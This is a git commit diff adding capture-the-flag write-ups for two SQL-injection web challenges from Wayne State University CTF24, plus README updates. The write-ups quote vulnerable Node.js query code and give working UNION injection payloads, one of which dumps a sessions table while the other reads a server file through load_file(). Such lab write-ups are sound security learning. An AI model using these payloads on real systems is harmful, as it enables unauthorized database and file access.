feat: added Wayne State University - CTF24
parent
5fd19bd6a5
commit
7ecc0a3c9f
Binary file not shown.
|
@ -0,0 +1,84 @@
|
||||||
|
# Eat More Cookies (Part 2)
|
||||||
|
> `-`
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We got a website and also the source code (You can download the source code [here](EatMoreCookiespt2.zip)). Here is the preview of the website
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
If we check the source code, especially this part:
|
||||||
|
|
||||||
|
```js
|
||||||
|
app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
|
||||||
|
cookies = req.query.cookies;
|
||||||
|
|
||||||
|
const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
|
||||||
|
|
||||||
|
pool.query(query, (err, result) => {
|
||||||
|
if(err){
|
||||||
|
return next(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return res.status(200).render("index", {cookies: result || []})
|
||||||
|
});
|
||||||
|
})
|
||||||
|
```
|
||||||
|
|
||||||
|
The `cookies` parameter is vulnerable to SQL injection, and we can get the flag by accessing `/flag` endpoint
|
||||||
|
|
||||||
|
```js
|
||||||
|
app.get("/flag", isAdmin, (req, res, next) => {
|
||||||
|
|
||||||
|
return res.json({"flag": "WSUCTF{F4ke_Flag}"})
|
||||||
|
})
|
||||||
|
```
|
||||||
|
|
||||||
|
But we need to login as administrator first:
|
||||||
|
|
||||||
|
```js
|
||||||
|
app.post("/adminLogin", async (req, res, next) => {
|
||||||
|
const { username, password } = req.body;
|
||||||
|
const query = 'SELECT * FROM users WHERE username = ? LIMIT 1';
|
||||||
|
try {
|
||||||
|
pool.query(query, [username], async (err, result) => {
|
||||||
|
|
||||||
|
user = result[0];
|
||||||
|
|
||||||
|
console.log(user);
|
||||||
|
|
||||||
|
if(!user){
|
||||||
|
return res.json({message: "User not found. Please try again."})
|
||||||
|
}
|
||||||
|
|
||||||
|
let comparePassword = await bcrypt.compare(password, user.password);
|
||||||
|
|
||||||
|
if(username == "Administrator" && comparePassword){
|
||||||
|
req.session.username = "Admin";
|
||||||
|
req.session.isAdmin = true;
|
||||||
|
|
||||||
|
return res.json({"message": "Successfully logged in as adminstrator."})
|
||||||
|
} else if(comparePassword){
|
||||||
|
return res.json({"message": "You are logged in, but you aren't administrator. You could've used the regular login instead!"})
|
||||||
|
} else {
|
||||||
|
return res.json({"message": "Invalid username or password. Please try again."})
|
||||||
|
}
|
||||||
|
})
|
||||||
|
} catch (err) {
|
||||||
|
return next(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
})
|
||||||
|
```
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
To solve this chall, im using unintended way. Im using `load_file()` MySQL function to read local file and then read `app.js` file
|
||||||
|
|
||||||
|
```
|
||||||
|
" union select 1,load_file('/app/src/app.js'),3-- -
|
||||||
|
```
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
WSUCTF{Sess1on_IDs_m4ch_more_v4lner9ble_th9n_I_TH0ught}
|
||||||
|
```
|
Binary file not shown.
After Width: | Height: | Size: 644 KiB |
Binary file not shown.
After Width: | Height: | Size: 46 KiB |
Binary file not shown.
|
@ -0,0 +1,51 @@
|
||||||
|
# Eat More Cookies
|
||||||
|
> `-`
|
||||||
|
|
||||||
|
## About the Challenge
|
||||||
|
We got a website and also the source code (You can download the source code [here](EatMoreCookies.zip)). Here is the preview of the website
|
||||||
|
|
||||||
|
![preview](images/preview.png)
|
||||||
|
|
||||||
|
If we check the source code, especially this part:
|
||||||
|
|
||||||
|
```js
|
||||||
|
app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
|
||||||
|
cookies = req.query.cookies;
|
||||||
|
|
||||||
|
const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
|
||||||
|
|
||||||
|
pool.query(query, (err, result) => {
|
||||||
|
if(err){
|
||||||
|
return next(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return res.status(200).render("index", {cookies: result || []})
|
||||||
|
});
|
||||||
|
})
|
||||||
|
```
|
||||||
|
|
||||||
|
The `cookies` paramter is vulnerable to SQL injection, and the flag is inside another table called `sessions`
|
||||||
|
|
||||||
|
```js
|
||||||
|
try {
|
||||||
|
const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
|
||||||
|
const sessionId = 'WSUCTF{F4ke_Flag}';
|
||||||
|
const expirationTimestamp = 1712172179;
|
||||||
|
|
||||||
|
const serializedData = JSON.stringify(adminCookieData);
|
||||||
|
|
||||||
|
const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;
|
||||||
|
```
|
||||||
|
|
||||||
|
## How to Solve?
|
||||||
|
To get every `session_id` inside `sessions` table, im using this payload:
|
||||||
|
|
||||||
|
```
|
||||||
|
" union select 1,(select group_concat(session_id) from sessions),3-- -
|
||||||
|
```
|
||||||
|
|
||||||
|
![flag](images/flag.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
{WSUCTF24:S3arching_Thr0ugh_Very_Expr3ssive_DBz}
|
||||||
|
```
|
Binary file not shown.
After Width: | Height: | Size: 148 KiB |
Binary file not shown.
After Width: | Height: | Size: 43 KiB |
|
@ -0,0 +1,7 @@
|
||||||
|
# Wayne State University - CTF24
|
||||||
|
CTF writeup for The Wayne State University - CTF24. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 75 teams
|
||||||
|
|
||||||
|
| Category | Challenge |
|
||||||
|
| --- | --- |
|
||||||
|
| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies/)
|
||||||
|
| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies%20(Part%202)/)
|
|
@ -11,6 +11,7 @@ There are __551__ CTF writeups that have been made in this repository
|
||||||
|
|
||||||
| Event Name | Team | Ranking |
|
| Event Name | Team | Ranking |
|
||||||
| ---------- | ---- | ------- |
|
| ---------- | ---- | ------- |
|
||||||
|
| Wayne State University - CTF24 | 1 |
|
||||||
| KnightCTF 2024 | Heroes Cyber Security | 1 |
|
| KnightCTF 2024 | Heroes Cyber Security | 1 |
|
||||||
| DeconstruCT.F 2023 | aseng_fans_club | 1 |
|
| DeconstruCT.F 2023 | aseng_fans_club | 1 |
|
||||||
| The Odyssey CTF | aseng_fans_club | 1 |
|
| The Odyssey CTF | aseng_fans_club | 1 |
|
||||||
|
@ -48,6 +49,7 @@ List of CTF events that i have joined before
|
||||||
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
|
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
|
||||||
| UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) |
|
| UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) |
|
||||||
| SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) |
|
| SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) |
|
||||||
|
| Wayne State University - CTF24 | Yes |[Link](/2024/Wayne%20State%20University%20-%20CTF24/) |
|
||||||
|
|
||||||
### Local Events
|
### Local Events
|
||||||
| Event Name | Writeup Available? | Writeup Link |
|
| Event Name | Writeup Available? | Writeup Link |
|
||||||
|
|
Loading…
Reference in New Issue